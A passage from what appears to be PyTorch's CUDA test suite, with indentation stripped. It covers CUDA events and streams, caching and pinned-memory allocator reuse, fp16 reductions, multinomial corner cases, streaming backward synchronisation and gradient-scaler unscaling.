torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES)
s1.record_event(e1)
e0.synchronize()
e1.synchronize()
with torch.cuda.device(d0):
with self.assertRaises(RuntimeError):
self.assertGreater(e0.elapsed_time(e1), 0)
with torch.cuda.device(d1):
with self.assertRaises(RuntimeError):
self.assertGreater(e0.elapsed_time(e1), 0)
with torch.cuda.device(d0):
s0 = torch.cuda.current_stream()
e2 = torch.cuda.Event(enable_timing=True)
torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES)
s0.record_event(e2)
s0.synchronize()
self.assertGreater(e0.elapsed_time(e2), 0)
# deliberately calling from a different device
with torch.cuda.device(d1):
self.assertGreater(e0.elapsed_time(e2), 0)
def test_record_stream(self):
cycles_per_ms = get_cycles_per_ms()
t = torch.FloatTensor([1, 2, 3, 4]).pin_memory()
result = torch.cuda.FloatTensor(t.size())
stream = torch.cuda.Stream()
ptr = [None]
# Performs the CPU->GPU copy in a background stream
def perform_copy():
with torch.cuda.stream(stream):
tmp = t.cuda(non_blocking=True)
ptr[0] = tmp.data_ptr()
torch.cuda.current_stream().wait_stream(stream)
tmp.record_stream(torch.cuda.current_stream())
torch.cuda._sleep(int(50 * cycles_per_ms)) # delay the copy
result.copy_(tmp)
perform_copy()
with torch.cuda.stream(stream):
tmp2 = torch.cuda.FloatTensor(t.size())
tmp2.zero_()
self.assertNotEqual(tmp2.data_ptr(), ptr[0], msg='allocation re-used to soon')
self.assertEqual(result.tolist(), [1, 2, 3, 4])
# Check that the block will be re-used after the main stream finishes
torch.cuda.current_stream().synchronize()
with torch.cuda.stream(stream):
tmp3 = torch.cuda.FloatTensor(t.size())
self.assertEqual(tmp3.data_ptr(), ptr[0], msg='allocation not re-used')
def test_record_stream_on_shifted_view(self):
# See issue #27366
# This test detects unexpected block reallocation. For reliable test,
# the stream to allocate tensors is isolated. The allocator will not
# reuse free blocks which were allocated from another stream.
stream_alloc = torch.cuda.Stream()
with torch.cuda.stream(stream_alloc):
base = torch.cuda.FloatTensor([10, 10])
# Record another stream on a shifted view tensor.
view = base[5:]
assert view.storage_offset() > 0
stream_record = torch.cuda.Stream()
with torch.cuda.stream(stream_record):
torch.cuda._sleep(int(50 * get_cycles_per_ms()))
view.record_stream(stream_record)
# Delete those tensors to make the block free soon.
data_ptr = base.data_ptr()
del base, view
# A new tensor should not be allocated to the block above.
stream_alloc.synchronize()
with torch.cuda.stream(stream_alloc):
try_realloc = torch.cuda.FloatTensor([10, 10])
self.assertNotEqual(try_realloc.data_ptr(), data_ptr)
def test_noncontiguous_pinned_memory(self):
# See issue #3266
x = torch.arange(0, 10).view((2, 5))
self.assertEqual(x.t(), x.t().pin_memory())
def test_caching_pinned_memory(self):
cycles_per_ms = get_cycles_per_ms()
# check that allocations are re-used after deletion
t = torch.FloatTensor([1]).pin_memory()
ptr = t.data_ptr()
del t
t = torch.FloatTensor([1]).pin_memory()
self.assertEqual(t.data_ptr(), ptr, msg='allocation not reused')
# check that the allocation is not re-used if it's in-use by a copy
gpu_tensor = torch.cuda.FloatTensor([0])
torch.cuda._sleep(int(50 * cycles_per_ms)) # delay the copy
gpu_tensor.copy_(t, non_blocking=True)
del t
t = torch.FloatTensor([1]).pin_memory()
self.assertNotEqual(t.data_ptr(), ptr, msg='allocation re-used too soon')
self.assertEqual(list(gpu_tensor), [1])
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_caching_pinned_memory_multi_gpu(self):
# checks that the events preventing pinned memory from being re-used
# too early are recorded on the correct GPU
cycles_per_ms = get_cycles_per_ms()
t = torch.FloatTensor([1]).pin_memory()
ptr = t.data_ptr()
gpu_tensor0 = torch.cuda.FloatTensor([0], device=0)
gpu_tensor1 = torch.cuda.FloatTensor([0], device=1)
with torch.cuda.device(1):
torch.cuda._sleep(int(50 * cycles_per_ms)) # delay the copy
gpu_tensor1.copy_(t, non_blocking=True)
del t
t = torch.FloatTensor([2]).pin_memory()
self.assertNotEqual(t.data_ptr(), ptr, msg='allocation re-used too soon')
with torch.cuda.device(0):
gpu_tensor0.copy_(t, non_blocking=True)
self.assertEqual(gpu_tensor1[0], 1)
self.assertEqual(gpu_tensor0[0], 2)
def test_caching_allocator_record_stream_oom(self):
"""allocations delayed by a record_stream call should still be freed on
an out-of-memory in cuda_malloc_retry. see issue #19219"""
stream = torch.cuda.Stream()
with torch.cuda.stream(stream):
y = torch.zeros(40 * 1024 * 1024, device='cuda')
for _ in range(100):
x = torch.empty(40 * 1024 * 1024, device='cuda')
with torch.cuda.stream(stream):
y += x
# delays re-use of `x` until after all operations in `stream`
x.record_stream(stream)
del x
# we've made a mess by allocating up to the device capacity. free any
# cached blocks in case it affects future tests.
torch.cuda.empty_cache()
# Tests for historic illegal memory access, see #17040.
def test_reduction_gpu_memory_accessing(self):
x = torch.ones(512, 8, dtype=torch.float32, device='cuda')
torch.sum(x, 0)
def test_sum_fp16(self):
x = torch.zeros(10, device='cuda', dtype=torch.float16)
self.assertEqual(x.sum(), 0)
x = torch.ones(65504, device='cuda', dtype=torch.float16)
self.assertEqual(x.sum(), 65504)
self.assertEqual(x.sum(dtype=torch.float32), 65504)
x = torch.ones(65536, device='cuda', dtype=torch.float16)
self.assertEqual(x.sum(dtype=torch.float32), 65536)
a = torch.zeros(1203611).bernoulli_(0.0005)
x = a.to(device='cuda', dtype=torch.float16)
self.assertEqual(x.sum().item(), a.sum().item())
a = torch.zeros(100, 121, 80).bernoulli_(0.0005)
x = a.to(device='cuda', dtype=torch.float16)
self.assertEqual(x.sum((0, 2)).float().cpu(), a.sum((0, 2)))
def test_mean_fp16(self):
x = torch.ones(65536, device='cuda', dtype=torch.float16)
self.assertEqual(x.mean(), 1)
x = torch.ones(65536, device='cuda', dtype=torch.float16)
self.assertEqual(x.mean(dtype=torch.float32), 1)
def test_prod_large(self):
# tests global reduction (should_global_reduce = true) in case of non-zero identity element
x = torch.ones(240000, device='cuda', dtype=torch.float32)
self.assertEqual(x.prod(), 1)
# test for complex types. Note 240k is divisible by 4
for dtype in [torch.cfloat, torch.cdouble]:
x = torch.ones(240000, device='cuda', dtype=dtype) * (0 + 1j)
self.assertEqual(x.prod(), 1)
def test_multinomial_ext(self):
# Test two corner cases from older PyTorch (Issue #4858)
freqs = torch.cuda.FloatTensor([
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,
0.03178183361887932, 0.027680952101945877, 0.033176131546497345,
0.046052902936935425, 0.07742464542388916, 0.11543981730937958,
0.14148041605949402, 0.15784293413162231, 0.13180233538150787,
0.08271478116512299, 0.049702685326337814, 0.027557924389839172,
0.018125897273421288, 0.011851548217236996, 0.010252203792333603,
0.007422595750540495, 0.005372154992073774, 0.0045109698548913,
0.0036087757907807827, 0.0035267581697553396, 0.0018864056328311563,
0.0024605290964245796, 0.0022964938543736935, 0.0018453967059031129,
0.0010662291897460818, 0.0009842115687206388, 0.00045109697384759784,
0.0007791675161570311, 0.00020504408166743815, 0.00020504408166743815,
0.00020504408166743815, 0.00012302644609007984, 0.0,
0.00012302644609007984, 4.100881778867915e-05, 0.0, 0.0, 0.0, 0.0,
0.0, 0.0])
torch.cuda.manual_seed(11042)
sample = torch.multinomial(freqs, 1000, True)
self.assertNotEqual(freqs[sample].min(), 0)
p = torch.zeros(3421, 2, device="cuda", dtype=torch.float)
p[:, 1] = 1
torch.cuda.manual_seed(5214)
r = torch.multinomial(p, 1)
self.assertNotEqual(r.min().item(), 0)
# test corner case from Issue #13867
torch.cuda.manual_seed(33)
probs = torch.randn(1000000, device='cuda').clamp(min=0) * 3e-5
samples = probs.multinomial(1000000, replacement=True)
self.assertGreater(probs[samples].min().item(), 0)
@staticmethod
def mute():
os.dup2(os.open(os.devnull, os.O_WRONLY), sys.stderr.fileno())
def _spawn_method(self, method, arg):
ctx = mp.get_context("spawn")
with ctx.Pool(1, initializer=self.mute) as pool:
errors = pool.map(method, [arg])
for e in errors:
if 'device-side assert triggered' not in str(e):
self.fail(e)
@staticmethod
def _test_multinomial_invalid_probs_cuda(probs):
try:
with torch.random.fork_rng(devices=[0]):
torch.multinomial(probs.to('cuda'), 2, replacement=True)
torch.cuda.synchronize()
return False # Should not be reached
except RuntimeError as e:
return e
@slowTest
@unittest.skipIf(NO_MULTIPROCESSING_SPAWN, "Disabled for environments that \
don't support multiprocessing with spawn start method")
@skipIfRocm
def test_multinomial_invalid_probs_cuda(self):
test_method = TestCuda._test_multinomial_invalid_probs_cuda
self._spawn_method(test_method, torch.tensor([1., -1., 1.]))
self._spawn_method(test_method, torch.tensor([1., inf, 1.]))
self._spawn_method(test_method, torch.tensor([1., -inf, 1.]))
self._spawn_method(test_method, torch.tensor([1., 1., nan]))
@slowTest
@unittest.skipIf(not TEST_LARGE_TENSOR, "not enough memory")
def test_huge_index(self):
src = torch.empty(15000000, 45, device='cuda', dtype=torch.long).random_(0, 2**22)
idx = torch.randperm(src.shape[0], device='cuda')
res = src[idx]
res_cpu = src.cpu()[idx.cpu()]
self.assertEqual(res.cpu(), res_cpu)
def test_tensor_gather(self):
AbstractTestCases._TestTorchMixin._test_gather(self, lambda t: t.cuda(), False)
def test_tensor_scatter(self):
AbstractTestCases._TestTorchMixin._test_scatter_base(self, lambda t: t.cuda(), 'scatter_', test_bounds=False)
def test_tensor_scatterAdd(self):
AbstractTestCases._TestTorchMixin._test_scatter_base(self, lambda t: t.cuda(), 'scatter_add_', test_bounds=False)
def test_scatter_add_mult_index_base(self):
AbstractTestCases._TestTorchMixin._test_scatter_add_mult_index_base(self, lambda t: t.cuda())
def test_tensor_scatterFill(self):
AbstractTestCases._TestTorchMixin._test_scatter_base(self, lambda t: t.cuda(),
'scatter_', True, test_bounds=False)
def test_tensor_scatter_complex(self):
AbstractTestCases._TestTorchMixin._test_scatter_base(self, lambda t: t.cuda(),
'scatter_', test_bounds=False, test_complex=True)
def test_tensor_scatterAdd_complex(self):
AbstractTestCases._TestTorchMixin._test_scatter_base(self, lambda t: t.cuda(),
'scatter_add_', test_bounds=False, test_complex=True)
def test_tensor_scatterFill_complex(self):
AbstractTestCases._TestTorchMixin._test_scatter_base(self, lambda t: t.cuda(),
'scatter_', True, test_bounds=False, test_complex=True)
def test_min_max_inits(self):
# Testing if THC_reduceAll received the correct index initialization.
# This affects the result of THC_reduceAll operations at extreme values
x = torch.cuda.ByteTensor([0])
y = torch.cuda.ByteTensor([255])
expected = torch.cuda.LongTensor([0])[0]
_, v = x.max(dim=0)
self.assertEqual(v, expected)
_, v = y.min(dim=0)
self.assertEqual(v, expected)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_get_set_rng_state_all(self):
states = torch.cuda.get_rng_state_all()
before0 = torch.cuda.FloatTensor(100, device=0).normal_()
before1 = torch.cuda.FloatTensor(100, device=1).normal_()
torch.cuda.set_rng_state_all(states)
after0 = torch.cuda.FloatTensor(100, device=0).normal_()
after1 = torch.cuda.FloatTensor(100, device=1).normal_()
self.assertEqual(before0, after0, atol=0, rtol=0)
self.assertEqual(before1, after1, atol=0, rtol=0)
def test_nvtx(self):
# Just making sure we can see the symbols
torch.cuda.nvtx.range_push("foo")
torch.cuda.nvtx.mark("bar")
torch.cuda.nvtx.range_pop()
def test_bincount_ext(self):
# ensure CUDA code coverage
input_size = (5000,)
w = torch.randn(input_size, dtype=torch.double, device='cuda')
w_cpu = w.cpu()
# test shared memory impl
t = torch.randint(50, input_size, dtype=torch.int8, device='cuda')
self.assertEqual(t.cpu().bincount(), t.bincount())
self.assertEqual(t.cpu().bincount(w_cpu), t.bincount(w))
# test multi block memory impl
# see `THRESH_NUMBER_BINS_FOR_MULTI_BLOCK_MEM` in SummaryOps.cu
t = torch.randint(500, input_size, dtype=torch.int64, device='cuda')
self.assertEqual(t.cpu().bincount(), t.bincount())
self.assertEqual(t.cpu().bincount(w_cpu), t.bincount(w))
# test global memory impl
# see `THRESH_NUMBER_BINS_FOR_GLOBAL_MEM` in SummaryOps.cu
t = torch.randint(2000, input_size, dtype=torch.int64, device='cuda')
self.assertEqual(t.cpu().bincount(), t.bincount())
self.assertEqual(t.cpu().bincount(w_cpu), t.bincount(w))
t = torch.zeros([10], dtype=torch.int32, device='cuda')
# 35488 * 65536 as int32 would cause overflow to negative value
# giving negative bin offset
t[0] = 35488
counted = t.bincount(minlength=65536)
self.assertEqual(torch.sum(counted), 10)
def test_tiny_half_norm_(self):
a = torch.arange(25).cuda().float()
a /= 100000000
b = a.half()
self.assertGreater(b.norm().item(), 0)
def test_norm_type_conversion(self):
a = torch.ones(65536).cuda().half()
self.assertEqual(a.norm(p=0, dtype=torch.float32), 65536)
# Test that wrap_with_cuda_memory_check successfully detects leak
def test_cuda_memory_leak_detection(self):
l = []
@self.wrap_with_cuda_memory_check
def no_leak():
pass
@self.wrap_with_cuda_memory_check
def leak_gpu0():
l.append(torch.tensor(10, device=torch.device("cuda:0")))
no_leak()
with self.assertRaisesRegex(AssertionError, r"leaked \d+ bytes CUDA memory on device 0"):
leak_gpu0()
if TEST_MULTIGPU:
@self.wrap_with_cuda_memory_check
def leak_gpu1():
l.append(torch.tensor(10, device=torch.device("cuda:1")))
with self.assertRaisesRegex(AssertionError, r"leaked \d+ bytes CUDA memory on device 1"):
leak_gpu1()
def test_cuda_memory_leak_detection_propagates_errors(self):
with self.assertRaisesRegex(RuntimeError, r"The size of tensor a \(3\) must match"):
with self.assertLeaksNoCudaTensors():
x = torch.randn(3, 1, device='cuda')
y = torch.randn(2, 1, device='cuda')
z = x + y
def test_trilu_indices(self):
for test_args in tri_tests_args:
_compare_trilu_indices(self, *test_args, device='cuda')
# test default options
x = torch.ones(
3, 3, dtype=torch.long, device='cuda', layout=torch.strided)
self.assertEqual(
x.tril(0).nonzero().transpose(0, 1),
torch.tril_indices(3, 3, device='cuda'))
self.assertEqual(
x.triu(0).nonzero().transpose(0, 1),
torch.triu_indices(3, 3, device='cuda'))
def test_large_trilu_indices(self):
for test_args in tri_large_tests_args:
_compare_large_trilu_indices(self, *test_args, device='cuda')
@unittest.skipIf(not TEST_MEDIUM_TENSOR, "not enough memory")
def test_cuda_kernel_loop_overflow(self):
# Issue #24309: In extreme cases, the loop variable could overflow and continue
# the kernel loop with a negative index, causing a RuntimeError (invalid write):
x = torch.randn(1, 1, 1, 2**30 + 1, dtype=torch.float16, device="cuda")
expected = x[0, 0, 0, 2**30]
y = torch.nn.functional.avg_pool2d(x, kernel_size=1)
torch.cuda.synchronize()
self.assertEqual(y[0, 0, 0, 2**30], expected)
@unittest.skipIf(not TEST_LARGE_TENSOR, "not enough memory")
def test_cuda_kernel_loop_overflow_large(self):
# Make sure input.numel() > INT_MAX is handled:
x = torch.randn(1, 1, 1, 2**31, dtype=torch.float16, device="cuda")
with self.assertRaisesRegex(RuntimeError, "integer out of range"):
y = torch.nn.functional.avg_pool2d(x, kernel_size=1)
# Issue #24309: In extreme cases, the loop variable could overflow and continue
# the kernel loop with a negative index, causing a RuntimeError (invalid write):
x = torch.randn(1, 1, 1, 2**31 - 1, dtype=torch.float16, device="cuda")
expected = x[0, 0, 0, 2**31 - 2]
y = torch.nn.functional.avg_pool2d(x, kernel_size=1)
torch.cuda.synchronize()
self.assertEqual(y[0, 0, 0, 2**31 - 2], expected)
@skipCUDANonDefaultStreamIf(True)
def test_streaming_backwards_sync(self):
default_stream = torch.cuda.current_stream()
stream = torch.cuda.Stream()
class MultiplyInStream(torch.autograd.Function):
@staticmethod
def forward(ctx, x):
return x * 2
@staticmethod
def backward(ctx, grad):
self.assertEqual(torch.cuda.current_stream(), stream)
# delays the operation in the the background stream
torch.cuda._sleep(1000 * 1000)
return grad * 2
x = torch.randn(5, 5, device='cuda', requires_grad=True)
with torch.cuda.stream(stream):
stream.wait_stream(default_stream)
output = MultiplyInStream.apply(x)
output.sum().backward()
self.assertEqual(x.grad, torch.ones_like(x) * 2)
self.assertEqual(torch.cuda.current_stream(), default_stream)
def test_streaming_backwards_multiple_streams(self):
class StreamModel(torch.nn.Module):
def __init__(self):
super(StreamModel, self).__init__()
self.event = torch.cuda.Event()
self.stream0 = torch.cuda.Stream()
self.stream1 = torch.cuda.Stream()
def forward(self, x):
x0 = x.clone()
torch._C._cuda_setStream(self.stream0._cdata)
y0 = x0 * 2
self.event.record(stream=torch.cuda.current_stream())
torch._C._cuda_setStream(self.stream1._cdata)
y1 = x * 3
self.stream1.wait_event(self.event)
return y0 + y1
stream = torch.cuda.Stream()
def accum_hook(grad):
self.assertEqual(torch.cuda.current_stream(), stream)
with torch.cuda.stream(stream):
x = torch.randn(5, 5, device='cuda', requires_grad=True)
x.register_hook(accum_hook)
torch.cuda.current_stream().wait_stream(stream)
model = StreamModel().cuda()
model(x).sum().backward()
self.assertEqual(x.grad, torch.ones_like(x) * 5)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_streaming_backwards_device_transfer(self):
# This function must run with non-default current streams on all devices, otherwise it's meaningless.
# The intention is to test that to()'s backward (CopyBackward) interacts properly with the
# synchronization logic in torch/csrc/autograd/input_buffer.cpp.
dev0 = torch.device("cuda:0")
dev1 = torch.device("cuda:1")
# Unfortunately I need to make the tensors largeish.
# Bigger tensors = longer D2D transfers = more likely to expose races.
size = 2**26
a = torch.full((size,), 1, device=dev1, dtype=torch.float64, requires_grad=True)
b = torch.full((size,), 1, device=dev1, dtype=torch.float64, requires_grad=True)
# Here to_backward_recipient = a*b is used only once, so MulBackward's InputBuffer slot only expects 1 input.
# This tests the situation where we don't call InputBuffer::accumulate for MulBackward's InputBuffer.
to_backward_recipient = a * b
s = to_backward_recipient.to(device="cuda:0").sum()
torch.cuda.synchronize(device=dev0)
torch.cuda.synchronize(device=dev1)
s.backward()
self.assertTrue(a.grad.sum().item() == size)
self.assertTrue(b.grad.sum().item() == size)
# Here to_backward_recipient = a*b is used twice, so MulBackward's InputBuffer slot expects 2 inputs.
# This tests the situation where we do call InputBuffer::accumulate for MulBackward's InputBuffer.
a.grad = None
b.grad = None
to_backward_recipient = a * b
# Multiply by 2 here so to's backward creates gradient values that are different from the case above,
# to mitigate weirdness if the caching allocator happens to reuse memory regions that were populated
# with 1s by the case above
s0 = to_backward_recipient.to(device="cuda:0").sum() * 2.
s1 = to_backward_recipient.to(device="cuda:0").sum() * 2.
torch.cuda.synchronize(device=dev0)
torch.cuda.synchronize(device=dev1)
s0.backward(retain_graph=True)
s1.backward()
self.assertTrue(a.grad.sum().item() == 4 * size)
self.assertTrue(b.grad.sum().item() == 4 * size)
def test_streaming_backward_sync_graph_root(self):
# This function tests if bwd ops running on a side stream properly sync with the GraphRoot.
# The potential bug it targets is a race condition. The test uses multiple trials and
# torch.cuda._sleep such that if the race condition exists, the test will almost certainly fail,
# but there's a chance it may spuriously pass. Passing does not guarantee the backend is bug-free,
# but failure does guarantee there is a bug.
fwd_bwd_op_stream = torch.cuda.Stream()
bwd_ambient_stream = torch.cuda.Stream()
# We need these streams to be different otherwise the test is meaningless.
self.assertTrue(fwd_bwd_op_stream != bwd_ambient_stream)
size = int(1e3)
a = torch.full((size,), 2.0, device="cuda", requires_grad=True)
b = torch.full((size,), 3.0, device="cuda", requires_grad=True)
# I don't think we need any manual record_streams below.
# a and b remain in scope for the entire test.
# c and grad remain in scope for each iteration, and there's a full sync between iterations.
for trial in range(5):
torch.cuda.synchronize()
a.grad = b.grad = None
with torch.cuda.stream(fwd_bwd_op_stream):
c = a * b
with torch.cuda.stream(bwd_ambient_stream):
torch.cuda.synchronize()
# Long-running dummy kernel on bwd_ambient_stream delays filling of grad
torch.cuda._sleep(int(50 * get_cycles_per_ms()))
# Fills grad on bwd_ambient_stream
grad = torch.full((size,), float(trial + 1), device="cuda")
# Bwd ops still run on fwd_bwd_ops_stream, so the following will likely fail if
# bwd ops don't sync with bwd_ambient_stream before consuming grad.
torch.autograd.backward(tensors=c, grad_tensors=grad)
# See https://github.com/pytorch/pytorch/issues/47028
# assertEquals below run on bwd_ambient_stream, so this test may also fail
# if backward() fails to sync with bwd_ambient_stream at the end.
# Synchronizing here works around the issue until a proper fix can be made.
torch.cuda.synchronize()
with torch.no_grad():
self.assertEqual(a.grad, grad * b)
self.assertEqual(b.grad, grad * a)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
@unittest.skipIf(IS_SANDCASTLE or IS_REMOTE_GPU, "Does not work on Sandcastle")
def test_cuda_init_race(self):
# See https://github.com/pytorch/pytorch/issues/16559
import subprocess
subprocess.check_call([sys.executable, '-c', """\
import torch
import threading
def worker(rank):
torch.tensor([1.]).cuda(rank)
t1 = threading.Thread(target=worker, args=(0,))
t2 = threading.Thread(target=worker, args=(1,))
t1.start()
t2.start()
"""])
# ROCm doesn't support device side asserts
@skipIfRocm
def test_fixed_cuda_assert_async(self):
with self.assertRaisesRegex(RuntimeError, "Boolean value of Tensor with no values is ambiguous"):
torch._assert_async(torch.tensor([], device="cuda"))
with self.assertRaisesRegex(RuntimeError, "Boolean value of Tensor with more than one value is ambiguous"):
torch._assert_async(torch.tensor([0, 0], device="cuda"))
torch._assert_async(torch.tensor(1, device="cuda"))
torch._assert_async(torch.tensor(0.1, device="cuda"))
torch._assert_async(torch.tensor(-0.1, device="cuda"))
torch._assert_async(torch.tensor(True, device="cuda"))
torch._assert_async(torch.tensor(0 + 0.1j, device="cuda"))
fail_stmts = [
"torch._assert_async(torch.tensor(0, device='cuda'))",
"torch._assert_async(torch.tensor(0.0, device='cuda'))",
"torch._assert_async(torch.tensor(False, device='cuda'))",
"torch._assert_async(torch.tensor(0 + 0j, device='cuda'))",
]
import subprocess
for stmt in fail_stmts:
with self.subTest(stmt=stmt):
r = subprocess.call([sys.executable, '-c', f"""\
import torch
{stmt}
torch.cuda.synchronize()
"""])
self.assertTrue(r != 0)
def test_grad_scaling_unscale(self, dtype=torch.float):
inv_scale = torch.full((1,), 0.25, dtype=torch.float, device="cuda:0")
found_inf = torch.full((1,), 0.0, dtype=torch.float, device="cuda:0")
size = 10
g = torch.full((size, size), 4.0, dtype=dtype, device="cuda:0")
ginf = g.clone()
ginf[2, 2] = float('inf')
gnan = g.clone()
gnan[2, 2] = float('nan')
# Tries selected combinations of
# - contiguous grads
# - g.clone().t() which is not contiguous but still non overlapping and dense
# - variants of g.clone()[:, :5] which are not non overlapping and dense
# Non overlapping and dense grads route into a multi tensor apply kernel,
# others use a fallback per-tensor kernel, so we should try both.
cases = (
([g.clone(), g.clone()], False),
([g.clone(), g.clone().t()], False),
([g.clone(), g.clone()[:, :5]], False),
([g.clone()[:, :5], g.clone()[:, :5]], False),
([g.clone(), ginf.clone()], True),
([g.clone(), gnan.clone()], True),
([g.clone(), ginf.clone()[:, :5]], True),
([g.clone(), gnan.clone()[:, :5]], True),
([ginf.clone(), g.clone()[:, :5]], True),
([ginf.clone()[:, :5], g.clone()[:, :5]], True),
)
for grads, has_inf in cases:
found_inf.zero_()
torch._amp_foreach_non_finite_check_and_unscale_(grads, found_inf, inv_scale)
if has_inf:
self.assertEqual(found_inf, 1.0)
else:
self.assertEqual(found_inf, 0.0)
for grad in grads:
self.assertTrue(torch.allclose(grad, torch.ones_like(grad), atol=1e-7))
# When passing lists with mismatched dtypes to a raw
# _amp_foreach_non_finite_check_and_unscale_ call,
# it's expected to fall back to single-tensor TensorIterator kernel.
grads = [g.clone(), g.to(dtype=torch.float16)]
torch._amp_foreach_non_finite_check_and_unscale_(grads, found_inf, inv_scale)
for grad in grads:
self.assertTrue(torch.allclose(grad, torch.ones_like(grad), atol=1e-7))
# Passing lists with mismatched devices to a raw
# _amp_foreach_non_finite_check_and_unscale_ call should raise errors.
if TEST_MULTIGPU:
with self.assertRaisesRegex(RuntimeError, r"Expected all tensors to be on the same device"):
torch._amp_foreach_non_finite_check_and_unscale_([g.clone(), g.to(device="cuda:1")],
found_inf,
inv_scale)
# Creates a list of grads with mismatched dtypes and devices, to ensure
# scaler._unscale_grads_ organizes grads by dtype and device before calling
# _amp_foreach_non_finite_check_and_unscale_ on each set.
# If inject_inf >= 0, writes an inf into one grad for _unscale_grads_ to find.
def perfect_storm_grads(inject_inf):
grads = [g.clone(), g.clone()[:, :5], g.to(dtype=torch.float16), g.to(dtype=torch.float16)]
if TEST_MULTIGPU:
grads += [g.to(device="cuda:1"),
g.to(device="cuda:1")[:, :5],
g.to(device="cuda:1", dtype=torch.float16),
g.to(device="cuda:1", dtype=torch.float16)]
if inject_inf >= 0:
grads[inject_inf][2, 2] = float('inf')
return grads
scaler = torch.cuda.amp.GradScaler()
dummy_params = [torch.empty_like(g) for g in perfect_storm_grads(-1)]
dummy_opt = torch.optim.SGD(dummy_params, lr=1.)
# Ensures the inf/nan checking can find an inf injected onto any grad in the perfect storm.
for inject_inf in range(-1, len(dummy_params)):
found_inf = torch.full((1,), 0.0, dtype=torch.float, device="cuda:0")
grads = perfect_storm_grads(inject_inf)
for i, p in enumerate(dummy_params):
p.grad = grads[i]
found_inf_per_device = scaler._unscale_grads_(dummy_opt, inv_scale, found_inf, True)
if inject_inf < 0:
# No inf was injected, ensures unscaling worked normally.
self.assertTrue(sum(v.item() for v in found_inf_per_device.values()) == 0)
for grad in grads:
self.assertTrue(torch.allclose(grad, torch.ones_like(grad), atol=1e-7))
else:
# inf was injected, ensures inf was found.
self.assertTrue(sum(v.item() for v in found_inf_per_device.values()) == 1)
def test_grad_scaling_update_scale(self, device="cuda", dtype=torch.float):
growth = 2.0
backoff = 0.25
growth_interval = 2
scale = torch.full((1,), 4.0, dtype=dtype, device=device)
growth_tracker = torch.full((1,), 0.0, dtype=torch.int32, device=device)
found_inf = torch.full((1,), 0.0, dtype=torch.float, device="cuda:0")
# Simulates 2 consecutive unskipped iterations
torch._amp_update_scale_(scale, growth_tracker, found_inf, growth, backoff, growth_interval)
self.assertEqual(growth_tracker, 1)
self.assertEqual(scale, 4.0)
torch._amp_update_scale_(scale, growth_tracker, found_inf, growth, backoff, growth_interval)
self.assertEqual(growth_tracker, 0)
self.assertEqual(scale, 8.0)
# Simulates a skipped iteration
found_inf.fill_(1.0)
torch._amp_update_scale_(scale, growth_tracker, found_inf, growth, backoff, growth_interval)
self.assertEqual(growth_tracker, 0)
self.assertEqual(scale, 2.0)
def test_grad_scaling_unscale_sparse(self, device="cuda", dtype=torch.float):
scaler = torch.cuda.amp.GradScaler()
inv_scale = torch.full((1,), 0.25, dtype=dtype, device=device)
found_inf = torch.empty((1,), dtype=dtype, device=device)
cur = found_inf.device
# As of d0c925f (4/16/20), docs are unclear about best API for sparse cuda tensor construction.
# https://pytorch.org/docs/master/tensors.html shows torch.sparse_coo_tensor(...), but it has no docstring.
# The same page shows several tensors with layout=torch.sparse_coo, but no constructors using that layout.
# Meanwhile, https://pytorch.org/docs/master/sparse.html shows torch.sparse.FloatTensor(...), which looks
# legacy and does not accept a device="cuda" kwarg. Going with torch.sparse_coo_tensor.
i = torch.tensor([[0, 1, 1],
[2, 0, 2]], device="cuda", dtype=torch.int64)
v = torch.tensor([16., 32., 64.], device="cuda", dtype=torch.float)
s = torch.sparse_coo_tensor(i, v, torch.Size([2, 3]), device="cuda", dtype=dtype)
p = s.clone()
assert p.is_sparse
opt = torch.optim.SGD([p], lr=1.)
p.grad = s.clone()
found_inf.zero_()
found_inf = scaler._unscale_grads_(opt, inv_scale, found_inf, False)[cur]
self.assertEqual(found_inf, 0.0)
self.assertTrue(torch.allclose(p.grad.to_dense(), (s / 4).to_dense()))
v = torch.FloatTensor([16., 32., float('inf')])
p.grad = torch.sparse_coo_tensor(i, v, torch.Size([2, 3]), device="cuda", dtype=dtype)
found_inf.zero_()
found_inf = scaler._unscale_grads_(opt, inv_scale, found_inf, False)[cur]
self.assertEqual(found_inf, 1.0)
v = torch.FloatTensor([16., 32., float('nan')])
p.grad = torch.sparse_coo_tensor(i, v, torch.Size([2, 3]), device="cuda", dtype=dtype)
found_inf.zero_()
found_inf = scaler._unscale_grads_(opt, inv_scale, found_inf, False)[cur]
self.assertEqual(found_inf, 1.0)
p = s.clone().half()
assert p.is_sparse
opt = torch.optim.SGD([p], lr=1.)
p.grad = s.clone().half()
found_inf.zero_()
found_inf = scaler._unscale_grads_(opt, inv_scale, found_inf, True)[cur]
self.assertEqual(found_inf, 0.0)
self.assertTrue(torch.allclose(p.grad.to_dense(), (s.half() / 4).to_dense()))
# Creates fp16 sparse tensor with duplicated indices (uncoalesced). The uncoalesced representation
# does not overflow in fp16, but the coalesced representation would, because 64000 + 64000 > fp16 max.
# _amp_non_finite_check_and_unscale_ should report an overflow here.
i = torch.LongTensor([[0, 1, 0],
[2, 0, 2]])
v = torch.FloatTensor([64000., 32., 64000.])
p.grad = torch.sparse_coo_tensor(i, v, torch.Size([2, 3]), device="cuda", dtype=torch.float16)
found_inf.zero_()
found_inf = scaler._unscale_grads_(opt, inv_scale, found_inf, True)[cur]
self.assertEqual(found_inf, 1.0)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_grad_scaling_device_as_key(self):
# Ensure that different instances of "device" objects that point to the same device
# are treated as identical keys by dicts. GradScaler relies on this behavior, and may
# error otherwise in a way that's difficult to detect (a silent performance hit).
d = {}
t = torch.empty((1,), device="cuda:0")
dev0a = torch.device("cuda:0")
dev0b = torch.device("cuda:0")
dev1a = torch.device("cuda:1")
dev1b = torch.device("cuda:1")
self.assertTrue(hash(dev0a) == hash(dev0b))
self.assertTrue(hash(dev1a) == hash(dev1b))
d[dev0a] = "0a"
d[dev0b] = "0b"
self.assertTrue(len(d) == 1)
self.assertTrue(d[dev0a] == "0b")
d[t.device] = "t"
self.assertTrue(len(d) == 1)
self.assertTrue(d[dev0a] == "t")
d[dev1a] = "1a"
d[dev1b] = "1b"
self.assertTrue(len(d) == 2)
